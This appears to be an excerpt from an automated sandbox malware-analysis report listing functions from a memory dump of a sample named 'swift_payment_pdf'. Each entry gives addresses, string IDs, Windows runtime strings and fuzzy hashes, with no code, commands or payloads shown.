                  • API String ID: 2994545307-634100481
                  • Opcode ID: db8f13b568ad7bf7613db6d407ee4cd577d730d675fe2688e3fefb2238b3d67a
                  • Instruction ID: 9bcc6ddb90b4463ffcd7eceb7f5e2194632f8c7794aabb24bce8c6c463a599e3
                  • Opcode Fuzzy Hash: db8f13b568ad7bf7613db6d407ee4cd577d730d675fe2688e3fefb2238b3d67a
                  • Instruction Fuzzy Hash: C2611972E007199FDB15DFA88940AAEBFB9FB48B08F14407DE659EB251D731AD40CB50
                  Function 013F43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: @$MUI
                  • API String ID: 0-17815947
                  • Opcode ID: 582e0810a0dc90d065a1a336828aa443256798aaefd853f2a72f31c608a5d1b3
                  • Instruction ID: af05141d47bbb131dbe25929241fc2768d5a50e45543954d7a7837d6f7a2b3b2
                  • Opcode Fuzzy Hash: 582e0810a0dc90d065a1a336828aa443256798aaefd853f2a72f31c608a5d1b3
                  • Instruction Fuzzy Hash: A751F771E0161DAEDF11DFA9CC84EEFBBBDEB44758F100529EA15B7290D6309A05CBA0
                  Function 013504E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                  Download Yara Rule
                  Strings
                  • kLsE, xrefs: 01350540
                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0135063D
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                  • API String ID: 0-2547482624
                  • Opcode ID: 70153d57de478dba8726e3b1318b591d192850011dd400c40ea4d6143e1f4fe9
                  • Instruction ID: c894a102c96acc725987bbcdd9962d6a2d42dd35cb673c2b2c67d26d68a7836e
                  • Opcode Fuzzy Hash: 70153d57de478dba8726e3b1318b591d192850011dd400c40ea4d6143e1f4fe9
                  • Instruction Fuzzy Hash: 6951B0715047428FD768DF68C580AA7BBE4EF84B18F10483EFAEA87241E772D545CBA1
                  Function 0135A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                  Download Yara Rule
                  Strings
                  • RtlpResUltimateFallbackInfo Enter, xrefs: 0135A2FB
                  • RtlpResUltimateFallbackInfo Exit, xrefs: 0135A309
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                  • API String ID: 0-2876891731
                  • Opcode ID: 45dbf201d60f0a1ecbd206ee1495ec73920fadfde8ebf4e5866e5dda63d264ea
                  • Instruction ID: 8b209eab2b491fb316fae7135a9b271300656ae62719c3490b76803c526a8ff1
                  • Opcode Fuzzy Hash: 45dbf201d60f0a1ecbd206ee1495ec73920fadfde8ebf4e5866e5dda63d264ea
                  • Instruction Fuzzy Hash: A141BC31A04649DBDB15DF59C880FAA7BB8FF84B0CF1442A5EE04DB692E6B5D900CB50
                  Function 0138A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID: Cleanup Group$Threadpool!
                  • API String ID: 2994545307-4008356553
                  • Opcode ID: 22eae8dde3b6c8de6ea540170c5dbbfb3243b4f5fa77b047279eb066ecc3bb4c
                  • Instruction ID: 3698edbd5994ae251d7d2f6a70869bd340137887eab39dfb9afb54b33c23e6f4
                  • Opcode Fuzzy Hash: 22eae8dde3b6c8de6ea540170c5dbbfb3243b4f5fa77b047279eb066ecc3bb4c
                  • Instruction Fuzzy Hash: 6F01D1B2251704AFD311EF14CD46B2677E8E78572DF01893AE658C7194E334D904CB4A
                  Function 0135C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: MUI
                  • API String ID: 0-1339004836
                  • Opcode ID: 8de56e7bcecc78cde520053ce5f3aef783eabd8ada9888d0d60d78aa9265096d
                  • Instruction ID: 9910eb8496ce67e4d5afcc7d2bcc44e774d5fde7a078135378e46f3c33474a05
                  • Opcode Fuzzy Hash: 8de56e7bcecc78cde520053ce5f3aef783eabd8ada9888d0d60d78aa9265096d
                  • Instruction Fuzzy Hash: 74825C75E003198BEB65CFA9C880BEDBBB9BF48B18F148169DD19AB351D7309D81CB50
                  Function 013D6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID: 0-3916222277
                  • Opcode ID: 757e33443a2a3f561a88aff021a3fed90cefa96d170d698bc7d99a5c96b45b03
                  • Instruction ID: d2742f80ebf4a8dc9407ae4333dcda9c6c93bfa31c0dda0ce2bcf22be8833c22
                  • Opcode Fuzzy Hash: 757e33443a2a3f561a88aff021a3fed90cefa96d170d698bc7d99a5c96b45b03
                  • Instruction Fuzzy Hash: 4C9195B2A00219AFEB21DF99DC85FAEBBB9EF14754F104065F610BB194D774AD04CBA0
                  Function 013FE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID: 0-3916222277
                  • Opcode ID: 21049c8bc84d205ccdb77ca27ca0edd6fa2bb42046e47c6cd250f0fd439f6089
                  • Instruction ID: 46e09681b543d04da333af35c066c03ed7e9601bb85ec1b0a58d06a8e34e74f3
                  • Opcode Fuzzy Hash: 21049c8bc84d205ccdb77ca27ca0edd6fa2bb42046e47c6cd250f0fd439f6089
                  • Instruction Fuzzy Hash: C191A136900609BFDF22ABA9DD44FAFBBBDEF45748F11002AF605A7260E7749901CB51
                  Function 0138A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: GlobalTags
                  • API String ID: 0-1106856819
                  • Opcode ID: 8a4b00ca6a02b7cf25751edca7fa6d34e658180a5ec58a5edd4e1218637cbe1c
                  • Instruction ID: 45923e1f9480614c53f4aec6ad8cd1d05953a6b7a58863861812393dd9374581
                  • Opcode Fuzzy Hash: 8a4b00ca6a02b7cf25751edca7fa6d34e658180a5ec58a5edd4e1218637cbe1c
                  • Instruction Fuzzy Hash: 8E715BB5E0030A9BDF28DF9CC5916AEBBB1BF88B18F14852EE905A7345E7359C41CB50
                  Function 013F4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: .mui
                  • API String ID: 0-1199573805
                  • Opcode ID: 3a731da6a57307980f76fd3e0b6ddd287f6b55cc9447a618b0510d96e20ca21d
                  • Instruction ID: 31b504b8a7c77f01c17cea95eb64fc11cfee4738f714108e6814d21f6a88bb29
                  • Opcode Fuzzy Hash: 3a731da6a57307980f76fd3e0b6ddd287f6b55cc9447a618b0510d96e20ca21d
                  • Instruction Fuzzy Hash: CC519172D0022A9BDF10DF9DD840AAFBBB8AF44A58F05412DEA15BB350D7349D05CFA4
                  Function 0136E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: EXT-
                  • API String ID: 0-1948896318
                  • Opcode ID: 227a3240f9877ef75cdd9f4ba487963dccb190e0d35474e90e7f8cc20bcf2a9e
                  • Instruction ID: 17aa967d950ca0f4e37c2f596a11f9e8f41c6449dd140d608e16cd9c75adf95e
                  • Opcode Fuzzy Hash: 227a3240f9877ef75cdd9f4ba487963dccb190e0d35474e90e7f8cc20bcf2a9e
                  • Instruction Fuzzy Hash: BC41A3765183129BD720DA79C844B6BBBECAF8871CF04893DF684D7184E678DA08C796
                  Function 013CC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: BinaryHash
                  • API String ID: 0-2202222882
                  • Opcode ID: c63062b123641a39902a7efeaa8b42363fe26d9c2e4f67d4838f1d36c76a36f4
                  • Instruction ID: b6a240fb65bf1064da2aa0d3896b2c82e70c4c01b53dea0f1d1c567cffc5b717
                  • Opcode Fuzzy Hash: c63062b123641a39902a7efeaa8b42363fe26d9c2e4f67d4838f1d36c76a36f4
                  • Instruction Fuzzy Hash: AB4124B1D0162DAADF21DA54CC84FDFB77CAB45718F0045A9AA0CAB140DB709E498FA4
                  Function 013E6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: #
                  • API String ID: 0-1885708031
                  • Opcode ID: 890b592b61545b3bc05bc6cdb758ce5e9ced5b5e8a610869f699f96f4cff7f18
                  • Instruction ID: 1867c7338c10ae17763f9a4f4b26dabc2c8be5191978781de274b2a6af6ab6fa
                  • Opcode Fuzzy Hash: 890b592b61545b3bc05bc6cdb758ce5e9ced5b5e8a610869f699f96f4cff7f18
                  • Instruction Fuzzy Hash: E2314A71A007299BEF22CB6DC859BEE7BE8DF6530CF104068E941AB2C2D775E815CB50
                  Function 013CCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: BinaryName
                  • API String ID: 0-215506332
                  • Opcode ID: 1940701c672b588136dbd05b35c0511b03bf872c2d83e164f643b24355e45759
                  • Instruction ID: cb9abcad9b83d633aa4fe8b757242e02f480096803f0be0697885b0d339da2f4
                  • Opcode Fuzzy Hash: 1940701c672b588136dbd05b35c0511b03bf872c2d83e164f643b24355e45759
                  • Instruction Fuzzy Hash: 35312736900519AFEB15DB9CC845E6FBB78EF80B18F01416DE909A7250D730AE04E7E0
                  Function 013D892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                  Download Yara Rule
                  Strings
                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 013D895E
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                  • API String ID: 0-702105204
                  • Opcode ID: 68d8d9ed6474000e132ddea1956145d20035b27ef588b90d24eb96f1b5d5ad49
                  • Instruction ID: 35e52dcbc068908490bbe3f09d2d076b611e598fa2b6174c1401e5c82bf330aa
                  • Opcode Fuzzy Hash: 68d8d9ed6474000e132ddea1956145d20035b27ef588b90d24eb96f1b5d5ad49
                  • Instruction Fuzzy Hash: A401F737200201ABEB206F59F884E5A7B65FF8565CB04046DF68116562CB30B841CB92
                  Function 013F2000 Relevance: .8, Instructions: 757COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b57c8bfd74560312363bce54d8815db3b172b3f66938efa4e13106154882a97b
                  • Instruction ID: 167608ac8cc13abbe687d0fb63d511ec492317eb8a18429a84107ef05f91803d
                  • Opcode Fuzzy Hash: b57c8bfd74560312363bce54d8815db3b172b3f66938efa4e13106154882a97b
                  • Instruction Fuzzy Hash: DA42D276608341DFEB25CF68C890A6BBBE5BF88308F48492DFB8697250D771D845CB52
                  Function 013E8158 Relevance: .6, Instructions: 617COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1477268e7c8bb34ca4b43d17f1dee713b2003299596d64e864a46749a44f4ff9
                  • Instruction ID: f96f581ec3fdc0678978ecbcbb9f436f1713e0eb0c985344808ce5988c7e8208
                  • Opcode Fuzzy Hash: 1477268e7c8bb34ca4b43d17f1dee713b2003299596d64e864a46749a44f4ff9
                  • Instruction Fuzzy Hash: CB424975E003298FEB25CF69C885BADBBF5BF48314F1480D9E949AB282D7349985CF50
                  Function 01362840 Relevance: .6, Instructions: 605COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e5cb11c892856ea6cfdb5fc26f76df8d7468a96bcd43dcf8c11141d130f02ba4
                  • Instruction ID: d5dd5b80df4e7e479111b9e9a468156bcae3a65fb04a9c44110cec4091a04465
                  • Opcode Fuzzy Hash: e5cb11c892856ea6cfdb5fc26f76df8d7468a96bcd43dcf8c11141d130f02ba4
                  • Instruction Fuzzy Hash: B732E2B0A007598FDB25CF69C8857FEBBF6BF84308F14811DD6469BA86E735A811CB50
                  Function 013FA118 Relevance: .6, Instructions: 591COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e7283663678d7241f73ec5e4501c06befee6558b53d8602429f39e587d170653
                  • Instruction ID: fc6ab360043b07fe8bcfba83c6526d1a44babf541cc38d0730d6ca2917e62c38
                  • Opcode Fuzzy Hash: e7283663678d7241f73ec5e4501c06befee6558b53d8602429f39e587d170653
                  • Instruction Fuzzy Hash: F522CD742046658BEB25CF2DC094772BBF1AF44348F08849EEB8E8F686D735E456DB60
                  Function 01356A50 Relevance: .5, Instructions: 548COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 65ac232f99eca4b4e44dcd792c7ec8287196c6d915757f0401ea9fbfc333d736
                  • Instruction ID: d06b1a0fd0afde0dcb3786e97bc6a953dda065d3b5bb5e5b5359ad04c373c231
                  • Opcode Fuzzy Hash: 65ac232f99eca4b4e44dcd792c7ec8287196c6d915757f0401ea9fbfc333d736
                  • Instruction Fuzzy Hash: E732F1B0A01209CFDB65CF69C490BAEBBF5FF48308F548569EA4AAB751D734E841CB50
                  Function 01374A35 Relevance: .4, Instructions: 423COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                  • Instruction ID: a611f3fd947bc2a5d8ebc0504cf9fc7910c56f48f7e8cb033a07dd7a89f0f3ec
                  • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                  • Instruction Fuzzy Hash: 57F17170E0020ADBDF25CF99C580BEEBBF5AF48718F048129EA45AB655E778EC41CB50
                  Function 013E892B Relevance: .4, Instructions: 386COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 96d0b67f913593028124276b1ea2ee66922d8eb08c7cff62f130d5d386d8cc29
                  • Instruction ID: 92d54bf746f3f554f1e4144da6e228c846e92e73f10a6a4bddb95b66de99bffd
                  • Opcode Fuzzy Hash: 96d0b67f913593028124276b1ea2ee66922d8eb08c7cff62f130d5d386d8cc29
                  • Instruction Fuzzy Hash: BCD1E171E0072A8BEF15CF6CC845AFEB7F5AF88308F1881A9D955A7281D735E9058B60
                  Function 013565D0 Relevance: .4, Instructions: 383COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1911c0025cae46f1f391afac7f06619827fd9dbcdaac3bf7e2c090d1a4c83654
                  • Instruction ID: d29c7e1c14f7827850619ddb80bb2b972f08b6619e38f6a9af55d1ed3d05b366
                  • Opcode Fuzzy Hash: 1911c0025cae46f1f391afac7f06619827fd9dbcdaac3bf7e2c090d1a4c83654
                  • Instruction Fuzzy Hash: 3BE19EB1608342CFC755CF28C090A6ABBF4FF89718F45896DE99987351EB31E905CB92
                  Function 01348397 Relevance: .4, Instructions: 380COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3574bcd9e6e3842c7468327c047f18b297f6a3fc9a2e793a30301c3b38281094
                  • Instruction ID: 65d5f3e6e5aac9e26239dc46179aeb34eef34f50461717c1bc86c3d2b00791ba
                  • Opcode Fuzzy Hash: 3574bcd9e6e3842c7468327c047f18b297f6a3fc9a2e793a30301c3b38281094
                  • Instruction Fuzzy Hash: 73D11671A0020ACBDB14DFA8C890ABABBF5FF5431CF04866DE915DB291E734E951CB50
                  Function 013D8243 Relevance: .3, Instructions: 322COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                  • Instruction ID: cd473ac673a3e3fb978e691a8e6c12154f30c400e9f1f171f7b2fedea75a04e2
                  • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                  • Instruction Fuzzy Hash: F1B18376A006059FDF24DFA9D940EABBBB9FF84318F10449DEA0297794DA34F905CB50
                  Function 01360535 Relevance: .3, Instructions: 300COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                  • Instruction ID: 955ba723b08e57eb603373a07cca928673a595def7d7d9ed3a2ef13aa96cffb1
                  • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                  • Instruction Fuzzy Hash: DFB15831604646EFDB25DBA8C890BBEBBFAEF44208F144169E742D7686E730ED41CB50
                  Function 013583C0 Relevance: .3, Instructions: 281COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 224651c18c45fcfbcdf7d93bfeaa40985f2b2eb4eeb49280add6cb9c2d802016
                  • Instruction ID: 1fb87e2a447a7eb992a144b96fc9c7bd841871a81dd67479b0732b88fded839d
                  • Opcode Fuzzy Hash: 224651c18c45fcfbcdf7d93bfeaa40985f2b2eb4eeb49280add6cb9c2d802016
                  • Instruction Fuzzy Hash: 08C16A74108381CFD764CF19C494BABB7E4BF88708F44496DE98987691E774E908CF92
                  Function 0134C427 Relevance: .3, Instructions: 280COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2f729274c6038232a9ffb4051332b48e39929a24277dc526d2091b3d1888b5af
                  • Instruction ID: 9fc27ff5a5a6c0d92d9882059f3d6e8ea1ffb1aa93c1b2679f572af576cbe1da
                  • Opcode Fuzzy Hash: 2f729274c6038232a9ffb4051332b48e39929a24277dc526d2091b3d1888b5af
                  • Instruction Fuzzy Hash: D2B18370A002658BDB34DF69C890BADB7F5EF44708F0485E9D50AE7251EB34ED85CB60
                  Function 0137E5E7 Relevance: .3, Instructions: 278COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 744b5bbfd226a09f437f1bb6dfd376055005b88f5caec5a48c48b5e4e9b2cc7a
                  • Instruction ID: 89e9c67bedc3ad9cb36068a7ca972aa9846389a1cc1b65893657a5cf4edde74e
                  • Opcode Fuzzy Hash: 744b5bbfd226a09f437f1bb6dfd376055005b88f5caec5a48c48b5e4e9b2cc7a
                  • Instruction Fuzzy Hash: D6A1F531E006599FEF31DB5CCC84BEEBBA8AB0475CF050165EB10AB691E7789D40CB91
                  Function 01390185 Relevance: .3, Instructions: 276COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a1bd045ed4814f69f8bacb4a674ccbb10d927b5eb81eef23f546f2b9f9f07f29
                  • Instruction ID: 1c03b7ba51d6fc9e6717f437bcd71a07a7f1324e58d4ff7c03dae5a73affa049
                  • Opcode Fuzzy Hash: a1bd045ed4814f69f8bacb4a674ccbb10d927b5eb81eef23f546f2b9f9f07f29
                  • Instruction Fuzzy Hash: D4A1C370B0161ADFDF29DF69C990BAAB7B9FF5472CF044029EA45A7281DB34E811CB50
                  Function 01424500 Relevance: .3, Instructions: 275COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ff8eb23adca48e493ec45ee1656ba82e635934dbcd76455611c4e83dfca91caa
                  • Instruction ID: 9e1212fa28cd2a5cd81fc41d872537ecd4721a673664e6432684a0c696327e0a
                  • Opcode Fuzzy Hash: ff8eb23adca48e493ec45ee1656ba82e635934dbcd76455611c4e83dfca91caa
                  • Instruction Fuzzy Hash: 97A1F172610622DFC721DF18C980B2AB7E9FF48758F89452AF5899B760C374EC81CB91
                  Function 01422B57 Relevance: .3, Instructions: 266COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                  • Instruction ID: e909d4bc8ac71a0e24623d1f6f72978433b7c0a3c28b669b7c04f3417891b783
                  • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                  • Instruction Fuzzy Hash: ACB13E71E0062ADFDF15CFADC880AAEB7B5FF48314F54816AE914A7364D770A981CB90
                  Function 013D60E0 Relevance: .3, Instructions: 264COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 33db668cea6076ab2f5081dac9c632a03184bab2e885062f3f3d3704d1627b7b
                  • Instruction ID: 637047f5c53554ae733563647b872503ecc501cd995b16a5ce54c006a3385bba
                  • Opcode Fuzzy Hash: 33db668cea6076ab2f5081dac9c632a03184bab2e885062f3f3d3704d1627b7b
                  • Instruction Fuzzy Hash: D991A7F2D0021AAFDF15CF68E885BAEBFB5AF48714F154169E620EB351D734D9008BA0
                  Function 0136E3F0 Relevance: .3, Instructions: 261COMMON
                  Download Yara Rule
